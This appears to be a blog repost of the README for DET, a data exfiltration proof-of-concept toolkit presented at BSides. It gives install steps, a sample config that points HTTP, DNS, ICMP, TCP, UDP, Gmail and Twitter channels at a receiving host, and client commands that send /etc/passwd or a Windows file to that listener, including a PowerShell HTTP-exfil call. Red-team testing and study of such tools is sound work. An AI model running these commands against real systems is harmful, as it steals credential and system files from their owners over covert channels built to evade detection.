DET - Data Exfiltration Toolkit

Thursday, April 14, 2016

DET (is provided AS IS), is a proof of concept to perform Data Exfiltration using either single or multiple channel(s) at the same time. The idea was to create a generic toolkit to plug any kind of protocol/service.

Slides
DET has been presented at BSides Ljubljana on the 9th of March 2016 and the slides will be available here. Slides are available here .

Example usage (ICMP plugin)

Server-side:

Client-side:

Usage while combining two channels (Gmail/Twitter)

Server-side:

Client-side:

Installation
Clone the repo:
git clone https://github.com/sensepost/DET.git
Then:
pip install -r requirements.txt --user

Configuration
In order to use DET, you will need to configure it and add your proper settings (eg. SMTP/IMAP, AES256 encryption passphrase and so on). A configuration example file has been provided and is called: config-sample.json
{
    "plugins": {
        "http": {
            "target": "192.168.1.101",
            "port": 8080
        },
        "google_docs": {
            "target": "192.168.1.101",
            "port": 8080,
        },
        "dns": {
            "key": "google.com",
            "target": "192.168.1.101",
            "port": 53
        },
        "gmail": {
            "username": "dataexfil@gmail.com",
            "password": "ReallyStrongPassword",
            "server": "smtp.gmail.com",
            "port": 587
        },
        "tcp": {
            "target": "192.168.1.101",
            "port": 6969
        },
        "udp": {
            "target": "192.168.1.101",
            "port": 6969
        },
        "twitter": {
            "username": "PaulWebSec",
            "CONSUMER_TOKEN": "XXXXXXXXX",
            "CONSUMER_SECRET": "XXXXXXXXX",
            "ACCESS_TOKEN": "XXXXXXXXX",
            "ACCESS_TOKEN_SECRET": "XXXXXXXXX"
        },
        "icmp": {
            "target": "192.168.1.101"
        }
    },
    "AES_KEY": "THISISACRAZYKEY",
    "sleep_time": 10
}

Usage

Help usage
python det.py -h
usage: det.py [-h] [-c CONFIG] [-f FILE] [-d FOLDER] [-p PLUGIN] [-e EXCLUDE]
              [-L]

Data Exfiltration Toolkit (SensePost)

optional arguments:
  -h, --help  show this help message and exit
  -c CONFIG   Configuration file (eg. '-c ./config-sample.json')
  -f FILE     File to exfiltrate (eg. '-f /etc/passwd')
  -d FOLDER   Folder to exfiltrate (eg. '-d /etc/')
  -p PLUGIN   Plugins to use (eg. '-p dns,twitter')
  -e EXCLUDE  Plugins to exclude (eg. '-e gmail,icmp')
  -L          Server mode

Server-side:
To load every plugin:
python det.py -L -c ./config.json
To load only twitter and gmail modules:
python det.py -L -c ./config.json -p twitter,gmail
To load every plugin and exclude DNS:
python det.py -L -c ./config.json -e dns

Client-side:
To load every plugin:
python det.py -c ./config.json -f /etc/passwd
To load only twitter and gmail modules:
python det.py -c ./config.json -p twitter,gmail -f /etc/passwd
To load every plugin and exclude DNS:
python det.py -c ./config.json -e dns -f /etc/passwd
And in PowerShell (HTTP module):
PS C:\Users\user01\Desktop>
PS C:\Users\user01\Desktop> . .\http_exfil.ps1
PS C:\Users\user01\Desktop> HTTP-exfil 'C:\path\to\file.exe'

Modules
So far, DET supports multiple protocols, listed here:
  • HTTP(S)
  • ICMP
  • DNS
  • SMTP/IMAP (eg. Gmail)
  • Raw TCP
  • PowerShell implementation (HTTP, DNS, ICMP, SMTP (used with Gmail))
And other "services":
  • Google Docs (Unauthenticated)
  • Twitter (Direct Messages)

Experimental modules
So far, I am busy implementing new modules which are almost ready to ship, including:
  • Skype (95% done)
  • Tor (80% done)
  • Github (30/40% done)

Roadmap

References
Some pretty cool references/credits to people I got inspired by with their project:



Subscribe via e-mail for updates!